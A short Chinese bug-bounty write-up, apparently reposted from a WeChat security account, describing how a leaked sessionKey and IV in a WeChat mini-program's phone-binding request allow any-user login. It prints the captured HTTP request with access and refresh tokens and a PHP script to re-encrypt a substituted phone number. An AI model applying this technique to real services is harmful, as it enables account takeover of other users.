这里可以看到泄露的iv和sessionKey
POST /api/ncdos/uc/sso/applet/bind/mobile HTTP/1.1Host: hm.city.pingan.comConnection: closeContent-Length: 337sign: 276610e073e53b4adf8bf3c0098e2f14content-type: application/jsonrealm: Ctimestamp: 1665224644307clientid: HM_CUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; HD1910 Build/LMY48Z; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36 MMWEBID/8585 MicroMessenger/8.0.3.1880(0x28000334) Process/appbrand0 WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm32 MiniProgramEnv/androidAccept-Encoding: gzip, deflateterminal: H5charset: utf-8refreshtoken: 99cfd3788d6849045115585665ed271faccesstoken: ad82b9ca8ad5b179d64ac77bcfd113e5nonce: ysbzlsbtjdwwReferer: https://servicewechat.com/wxad6a45778949f5cc/1/page-frame.html{"iv":"zFRZO0sUflC+AAXwE4Kb6w==","encryptedData":"bObdppTXRfppTTkjfPdu09AGeNdR3MLdmz2aL4+YfhD9+MgDU6cOs//7S6gw+94V9WlzeNhXT6v9xd0GwhdDUiH2HMo4iVlQPGEbxqg+swsd840r4KnZ8QEohuIrRsxu8F6qiz6c9z2KNEjLieMNg2Djys0AQB2KNH73iFKIPzPuM/yX/MuJOWwRM/2HYtER1pXmYYUucccccfKAU778fXA==","appId":"wxcccccc778949f5cc","sessionKey":"nInM5GccccccyPsy5efzQ=="}
POST /api/ncdos/uc/sso/applet/bind/mobile HTTP/1.1 Host: hm.city.pingan.com Connection: close Content-Length: 337 sign: 276610e073e53b4adf8bf3c0098e2f14 content-type: application/json realm: C timestamp: 1665224644307 clientid: HM_C User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; HD1910 Build/LMY48Z; wv) Ap pleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobi le Safari/537.36 MMWEBID/8585 MicroMessenger/8.0.3.1880(0x28000334) Proces s/appbrand0 WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm32 Mini ProgramEnv/android Accept-Encoding: gzip, deflate terminal: H5 charset: utf-8 refreshtoken: 99cfd3788d6849045115585665ed271f accesstoken: ad82b9ca8ad5b179d64ac77bcfd113e5 nonce: ysbzlsbtjdww Referer: https://servicewechat.com/wxad6a45778949f5cc/1/
{"iv":"zFRZO0sUflC+AAXwE4Kb6w==","encryptedData":"bObdppTXRfppTTkjfPdu09AG eNdR3MLdmz2aL4+YfhD9+MgDU6cOs//7S6gw+94V9WlzeNhXT6v9xd0GwhdDUiH2HMo4iVlQPG Ebxqg+swsd840r4KnZ8QEohuIrRsxu8F6qiz6c9z2KNEjLieMNg2Djys0AQB2KNH73iFKIPzPu M/yX/MuJOWwRM/2HYtER1pXmYYUug8jnfKAU778fXA==","appId":"wxad6a45778949f5c c","sessionKey":"nInM5GcdijaFGyPsy5efzQ=="}
获取iv + sessionKey 后,我们写一个脚本进行解密
获取手机号码后,替换手机号进行加密。然后替换加密数据进行登录。
echo"请输⼊SessionKey: ";$sessionKey = fgets(STDIN);echo"请输⼊本次解密IV: ";$iv = fgets(STDIN);echo"请输⼊待加密内容: ";$decryptedData = fgets(STDIN);functionencryptData($decryptedData, $iv, $sessionKey){$aesIV = base64_decode($iv);$aesCipher = $decryptedData;$aesKey = base64_decode($sessionKey);$result = openssl_encrypt($aesCipher, $aesKey,0, $aesIV);$dataObj = json_decode($result);return$result;}
{"phoneNumber":"17333333333","purePhoneNumber":"17333333333","countryCode":"86","watermark":{"timestamp":1665224642,"appid":"wx89xxxxcc"}}
更多实战案例可加入【红蓝攻防成长圈】
End
原文始发于微信公众号(贝雷帽SEC):【Tips】某SRC高危—sessionKey泄露导致任意用户登录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论